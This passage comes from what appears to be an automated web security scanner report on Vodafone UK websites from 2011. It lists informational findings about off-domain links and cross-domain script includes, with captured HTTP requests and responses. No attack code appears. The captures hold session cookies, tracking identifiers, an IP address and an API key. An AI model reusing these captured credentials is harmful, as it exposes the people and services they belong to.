Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d868460bd4d2f7b3bfd24b31ecc25919%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641730%3B%7D32b319bdf5baa07eca6eaf56a85ebeb1; expires=Fri, 18-Nov-2011 19:42:10 GMT; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49037

<!DOCTYPE html>




<link rel="stylesheet" media="all" href="https://c411930.ssl.cf3.rackcdn.com/css/screen.css" />

<script src="https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js"></script>

<script src="https://c411930.ssl.cf3.rackcdn.com/js/lib/fancybox/jquery.fancybox-1.3.4.pack.js"></script>
<script src="https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib_validator_orders_countries.min.js"></script>
<script src="https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lightbox.js"></script>
<link rel="stylesheet" href="https://c411930.ssl.cf3.rackcdn.com/css/jquery.fancybox-1.3.4.css" type="text/css" media="screen" />

<script type="text/javascript">
...[SNIP]...
</script> <link href="https://c411930.ssl.cf3.rackcdn.com/css/vodafone_co_uk.css" rel="stylesheet" type="text/css" />
</head>
...[SNIP]...
<input type="radio" class="radio" id="sim_type_standard" name="order[sim_type]" value="standard" checked="checked" />
<img src="https://c411930.ssl.cf3.rackcdn.com/images/interface/icon_sim-large.gif" alt="Standard SIM" />
<span>
...[SNIP]...
<input type="radio" class="radio" id="sim_type_micro" name="order[sim_type]" value="micro" />
<img src="https://c411930.ssl.cf3.rackcdn.com/images/interface/icon_sim-small.gif" alt="Micro SIM" />
<span>
...[SNIP]...
</script>

<iframe src="https://secure.img-cdn.mediaplex.com/0/18329/universal.html?page_name=proposition_page&Proposition_Page=1&mpuid=weekend" height="1" width="1" frameborder="0"></iframe>
...[SNIP]...
<noscript><img src="//vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0" height="1" width="1" alt="" /></noscript>
...[SNIP]...

8.3. https://freesim.vodafone.co.uk/packages/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/packages/index

Issue detail

The page was loaded from a URL containing a query string:

https://freesim.vodafone.co.uk/packages/index?tracker=58f8dj&keyword=freesim

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://c411930.ssl.cf3.rackcdn.com/css/screen.css
https://c411930.ssl.cf3.rackcdn.com/css/vodafone_co_uk.css
https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib.min.js
https://secure.img-cdn.mediaplex.com/0/18329/universal.html?page_name=freesims_homepage&freesim_homepage=1&mpuid=
https://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0

Request

Response

8.4. http://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The page was loaded from a URL containing a query string:

http://help.vodafone.co.uk/system/selfservice.controller?CONFIGURATION=1000&PARTITION_ID=1&CMD=STARTPAGEFRAMELESS&USERTYPE=1&LANGUAGE=en&COUNTRY=us&TIMEZONE_OFFSET=-3600000

The response contains the following links to other domains:

http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u=
http://digg.com/submit?url=http://www.vodafone.co.uk&title=
http://twitter.com/home?status=http://www.vodafone.co.uk&title=
http://twitter.com/vodafoneuk/
http://vodafone360.com/en
http://vodafonebuyback.co.uk/
http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupuk/1/H.20.3--NS/0
http://www.delicious.com/save?url=http://www.vodafone.co.uk&title=
http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title=
http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title=

Request

GET /system/selfservice.controller?CONFIGURATION=1000&PARTITION_ID=1&CMD=STARTPAGEFRAMELESS&USERTYPE=1&LANGUAGE=en&COUNTRY=us&TIMEZONE_OFFSET=-3600000 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: help.vodafone.co.uk
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 18:43:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 60783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<li><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://vodafone360.com/en">Vodafone 360</a>
...[SNIP]...
</h4><a rel="external" href="http://twitter.com/vodafoneuk/ "><img src="http://help.vodafone.co.uk/system/Device/manu/team_lee_2.png" alt="Lee"/></a><a rel="external" href="http://twitter.com/vodafoneuk/ " class="quote"><em>
...[SNIP]...
<dd><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://twitter.com/home?status=http://www.vodafone.co.uk&title="><img alt='Create a Twitter bookmark' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053211.png" />
...[SNIP]...
<li><a href="http://www.delicious.com/save?url=http://www.vodafone.co.uk&title="><img alt='Delicious' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053214.png" />
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title="><img alt='Facebook' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053216.png" />
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title="><img alt='StumbleUpon' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053210.png" />
...[SNIP]...
<li><a href="http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u="><img alt='Yahoo bookmarks' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053212.png" />
...[SNIP]...
<li><a href="http://digg.com/submit?url=http://www.vodafone.co.uk&title="><img alt='Share this page on Digg' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053218.png" />
...[SNIP]...
<noscript><img src="http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupuk/1/H.20.3--NS/0" height="1" width="1" border="0" alt=""/></noscript>
...[SNIP]...

8.5. http://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The page was loaded from a URL containing a query string:

http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=search&PARTITION_ID=1&CONFIGURATION=1000&helpSearchAlpha=htc+sony

The response contains the following links to other domains:

http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u=
http://digg.com/submit?url=http://www.vodafone.co.uk&title=
http://twitter.com/home?status=http://www.vodafone.co.uk&title=
http://vodafone360.com/en
http://vodafonebuyback.co.uk/
http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupuk/1/H.20.3--NS/0
http://www.delicious.com/save?url=http://www.vodafone.co.uk&title=
http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title=
http://www.google.com/jsapi?key=ABQIAAAAj__kJ6aaO3s5ijjGn0zvPRSbWc6EXbZAWA482RqwSy1mqMtZXBRE4G4BLD229jpU7eZwEijNhP_qVw
http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title=

Request

GET /system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=search&PARTITION_ID=1&CONFIGURATION=1000&helpSearchAlpha=htc+sony HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&PARTITION_ID=1&CONFIGURATION=1058&SIDE_LINK_TOPIC_ID=9849&TOPIC_ID=9849&TOPIC_TYPE=0&STARTING_ID=0&TOPIC_NAME=Sony%20Ericsson&PARENT_TOPIC_ID=-1&PARENT_TOPIC_TYPE=0&SOURCE_FORM=BROWSE_TOPIC
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644560406%3B%20s_invisit%3Dtrue%7C1321644561166%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644561279%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20s_sq%3Dvodafonegroupukprod%253D%252526pid%25253Dhel%2525253ASony%25252520Ericsson%25252520-%25252520Help%25252520-%25252520Vodafone%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Nov 2011 19:01:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: private
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding, User-Agent
Content-Length: 47654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<li><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://vodafone360.com/en">Vodafone 360</a>
...[SNIP]...


<script src="http://www.google.com/jsapi?key=ABQIAAAAj__kJ6aaO3s5ijjGn0zvPRSbWc6EXbZAWA482RqwSy1mqMtZXBRE4G4BLD229jpU7eZwEijNhP_qVw" type="text/javascript"></script>
...[SNIP]...
<dd><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://twitter.com/home?status=http://www.vodafone.co.uk&title="><img alt='Create a Twitter bookmark' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053211.png" />
...[SNIP]...
<li><a href="http://www.delicious.com/save?url=http://www.vodafone.co.uk&title="><img alt='Delicious' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053214.png" />
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title="><img alt='Facebook' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053216.png" />
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title="><img alt='StumbleUpon' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053210.png" />
...[SNIP]...
<li><a href="http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u="><img alt='Yahoo bookmarks' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053212.png" />
...[SNIP]...
<li><a href="http://digg.com/submit?url=http://www.vodafone.co.uk&title="><img alt='Share this page on Digg' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053218.png" />
...[SNIP]...
<noscript><img src="http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupuk/1/H.20.3--NS/0" height="1" width="1" border="0" alt=""/></noscript>
...[SNIP]...

8.6. http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js

Issue detail

The page was loaded from a URL containing a query string:

http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js?v=20110504

The response contains the following links to other domains:

http://img.youtube.com/vi/"+ytIDs[i]+"/2.jpg
http://www.youtube.com/user/VodafoneHelpCentre
http://www.youtube.com/v/"+ytIDs[0]+"&fs=1
http://www.youtube.com/v/"+ytIDs[i]+"

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=STARTPAGEFRAMELESS&CONFIGURATION=1058&PARTITION_ID=1&USERTYPE=1&LANGUAGE=en&COUNTRY=US&TIMEZONE_OFFSET=-3600000
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=session#1321641039287-389573#1321643548|PC#1321641039287-389573.19#1322851288|check#true#1321641748; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321643488458%3B%20s_nr%3D1321641688464%7C1324233688464%3B%20s_invisit%3Dtrue%7C1321643488482%3B%20gpv_p32%3DUK%253ABrands%253AiPhone%253APaymonthlyiPhone%7C1321643488487%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/9; s_sess=%20s_sv_sid%3D709713783754%3B%20ev1%3Dg3%2520internet%2520web%2520surfing%3B%20s_scount%3D2%3B%20s_stack%3D1%253Apress%2520relese%2520contact%257C2%253Ag3%2520internet%2520web%2520surfing%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D50%3B; eGain_eService_JSESSIONID=5r21TGnQkQwnXlP6wnYsGVnVnhH7JQS4Cp4sGK5sqGD3YHm0yKL8!-1484610483; web_templates_personalization_cookie#1058#1=; BIGipServerpool_ems00820ss=721422602.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 21986
Content-Type: application/octet-stream
Last-Modified: Mon, 09 May 2011 12:16:18 GMT
Accept-Ranges: bytes
ETag: "a7e55ee642ecc1:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:42:39 GMT

/*jslint evil: true, forin: true */

/**
* @fileOverview Methods and Functions for the device detail guide overlays
* @author Sapient
* @version 0.1
* @class
* @namespace vdf.helpCenter.search
...[SNIP]...
<p class='moreVideos'><a class='external' target='_blank' href='http://www.youtube.com/user/VodafoneHelpCentre#"+ytplLink+"'>See more videos on YouTube</a>
...[SNIP]...
<param value='always' name='allowscriptaccess' />\n";
html+="<embed width='448' height='277' allowfullscreen='true' allowscriptaccess='always' type='application/x-shockwave-flash' src='http://www.youtube.com/v/"+ytIDs[0]+"&fs=1' />\n";
html+="</object>
...[SNIP]...
<a id='ytVidLink"+i+"' rel='video0"+i+"' href='http://www.youtube.com/v/"+ytIDs[i]+"'><img id='ytImgvideo"+i+"' style='margin:-13px 0px 0px -4px;width:120px;height:90px;' src='http://img.youtube.com/vi/"+ytIDs[i]+"/2.jpg' alt='start video' /><div class='startbutton'>
...[SNIP]...
<div class='thumbCopy'><a id='ytVidLink"+i+"' rel='video0"+i+"' href='http://www.youtube.com/v/"+ytIDs[i]+"' ytid='"+ytIDs[i]+"'></a>
...[SNIP]...

8.7. https://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The page was loaded from a URL containing a query string:

https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000

The response contains the following link to another domain:

https://j.clickdensity.com/cr.js

Request

Response

8.8. http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.vodafone.co.uk
Path:	/dispatch/Portal/appmanager/vodafone/wrp

Issue detail

The page was loaded from a URL containing a query string:

http://online.vodafone.co.uk/dispatch/Portal/appmanager/vodafone/wrp?_nfpb=true&_pageLabel=Page_Search_searchResult&pageID=PSE_0001

The response contains the following links to other domains:

http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u=
http://digg.com/submit?url=http://www.vodafone.co.uk&title=
http://twitter.com/home?status=http://www.vodafone.co.uk&title=
http://vodafonebuyback.co.uk/
http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0
http://www.delicious.com/save?url=http://www.vodafone.co.uk&title=
http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title=
http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:30:38 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 57438
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<li><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<dd><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://twitter.com/home?status=http://www.vodafone.co.uk&title="><img alt='Create a Twitter bookmark' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053211.png" />
...[SNIP]...
<li><a href="http://www.delicious.com/save?url=http://www.vodafone.co.uk&title="><img alt='Delicious' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053214.png" />
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title="><img alt='Facebook' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053216.png" />
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title="><img alt='StumbleUpon' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053210.png" />
...[SNIP]...
<li><a href="http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u="><img alt='Yahoo bookmarks' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053212.png" />
...[SNIP]...
<li><a href="http://digg.com/submit?url=http://www.vodafone.co.uk&title="><img alt='Share this page on Digg' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053218.png" />
...[SNIP]...
<noscript><img src="http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

8.9. http://troubleshootinghelp.vodafone.co.uk/start previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://troubleshootinghelp.vodafone.co.uk
Path:	/start

Issue detail

The page was loaded from a URL containing a query string:

http://troubleshootinghelp.vodafone.co.uk/start?CB=495724206181318734&TP=vfpocweb&CMD=iSearch&LG=1&PR=1

The response contains the following link to another domain:

http://go.microsoft.com/fwlink/?linkid=8180

Request

GET /start?CB=495724206181318734&TP=vfpocweb&CMD=iSearch&LG=1&PR=1 HTTP/1.1
Host: troubleshootinghelp.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:32:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...

8.10. http://troubleshootinghelp.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://troubleshootinghelp.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The page was loaded from a URL containing a query string:

http://troubleshootinghelp.vodafone.co.uk/system/selfservice.controller?CONFIGURATION=1005&PARTITION_ID=1&secureFlag=false&CMD=iStartSearch&USERTYPE=1&CB=1000000001&FI=1&LANGUAGE=en&COUNTRY=us

The response contains the following links to other domains:

http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u=
http://digg.com/submit?url=http://www.vodafone.co.uk&title=
http://twitter.com/home?status=http://www.vodafone.co.uk&title=
http://vodafonebuyback.co.uk/
http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0
http://www.delicious.com/save?url=http://www.vodafone.co.uk&title=
http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title=
http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title=

Request

GET /system/selfservice.controller?CONFIGURATION=1005&PARTITION_ID=1&secureFlag=false&CMD=iStartSearch&USERTYPE=1&CB=1000000001&FI=1&LANGUAGE=en&COUNTRY=us HTTP/1.1
Host: troubleshootinghelp.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=check#true#1321641123|session#1321641039287-389573#1321642923|PC#1321641039287-389573.19#1322850667; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321642874952%3B%20s_nr%3D1321641074957%7C1324233074957%3B%20s_invisit%3Dtrue%7C1321642874962%3B%20gpv_p32%3DUK%253APersonal%7C1321642874965%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/3; s_sess=%20s_scount%3D1%3B%20s_stack%3D1%253Apress%2520relese%2520contact%3B%20s_sv_sid%3D709713783754%3B%20ev1%3Dpress%2520relese%2520contact%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D57%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Fri, 18 Nov 2011 18:32:53 GMT
Pragma: private
Content-Type: text/html;charset=UTF8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
Set-Cookie: USERTYPE=1
Set-Cookie: web_templates_personalization_cookie#1005#1=; Expires=Sat, 17-Nov-2012 18:32:53 GMT
Vary: Accept-Encoding
Content-Length: 52609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">



...[SNIP]...
<li><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<dd><a href="http://vodafonebuyback.co.uk">Trade in your phone</a>
...[SNIP]...
<li><a href="http://twitter.com/home?status=http://www.vodafone.co.uk&title="><img alt='Create a Twitter bookmark' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053211.png" />
...[SNIP]...
<li><a href="http://www.delicious.com/save?url=http://www.vodafone.co.uk&title="><img alt='Delicious' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053214.png" />
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://www.vodafone.co.uk&title="><img alt='Facebook' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053216.png" />
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://www.vodafone.co.uk&title="><img alt='StumbleUpon' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053210.png" />
...[SNIP]...
<li><a href="http://bookmarks.yahoo.com/myresults/bookmarklet?t=http://www.vodafone.co.uk&u="><img alt='Yahoo bookmarks' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053212.png" />
...[SNIP]...
<li><a href="http://digg.com/submit?url=http://www.vodafone.co.uk&title="><img alt='Share this page on Digg' src="//www.vodafone.co.uk/consumer/groups/public/documents/webcontent/vftst053218.png" />
...[SNIP]...
<noscript><img src="http://vodafoneuk.122.2o7.net/b/ss/vodafonegroupukprod/1/H.20.3--NS/0" height="1" width="1" border="0" alt=""/></noscript>
...[SNIP]...

9. Cross-domain script include previous next
There are 19 instances of this issue:

http://enterprise.vodafone.com/favicon.ico
http://enterprise.vodafone.com/home/
http://enterprise.vodafone.com/images/iconCartDarkred.gif
http://enterprise.vodafone.com/images/prod_browse_bkgrd2.gif
http://enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp
http://enterprise.vodafone.com/products_solutions/
http://enterprise.vodafone.com/products_solutions/industry/
http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp
http://enterprise.vodafone.com/products_solutions/mobile_broadband/
http://enterprise.vodafone.com/products_solutions/mobile_broadband/usb_modem.jsp
http://forum.vodafone.co.uk/
http://forum.vodafone.co.uk/t5/Apple/bd-p/72
http://forum.vodafone.co.uk/t5/BlackBerry/bd-p/50
http://forum.vodafone.co.uk/t5/HTC/bd-p/htc
http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70
https://freesim.vodafone.co.uk/orders/add
https://freesim.vodafone.co.uk/packages/index
http://help.vodafone.co.uk/system/selfservice.controller
https://help.vodafone.co.uk/system/selfservice.controller

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

9.1. http://enterprise.vodafone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a298d635f4b7d13
http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: enterprise.vodafone.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Nov 2011 18:27:16 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 41836

<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
